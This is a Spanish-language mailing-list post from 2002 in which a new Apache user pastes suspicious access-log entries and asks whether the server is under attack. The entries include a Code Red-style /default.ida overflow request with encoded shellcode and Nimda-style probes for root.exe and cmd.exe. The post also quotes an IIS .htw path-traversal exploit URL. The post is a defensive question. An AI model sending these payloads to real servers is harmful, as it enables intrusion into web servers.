[Posible OT]Mas apache
Hola a todos:
Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer
mirando el acces.log me encontre con esto:
218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
400 331 "-" "-"
y con esto:
217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 287 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
Buscando exploits y eso me encontre con este (aunque solo es de IIS):
http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../..
/./..test.txt&CiRestriction=none&CiHiliteType=Full
Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo
raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace
poco y lo puse para probar
Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
--
____________________________________
* *
* web personal: http://go.to/nuestra.web *
* Linux user #255925 *
* Debian/GNU *
* Kernel 2.2.18 *
*___________________________________*
--
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Reply to: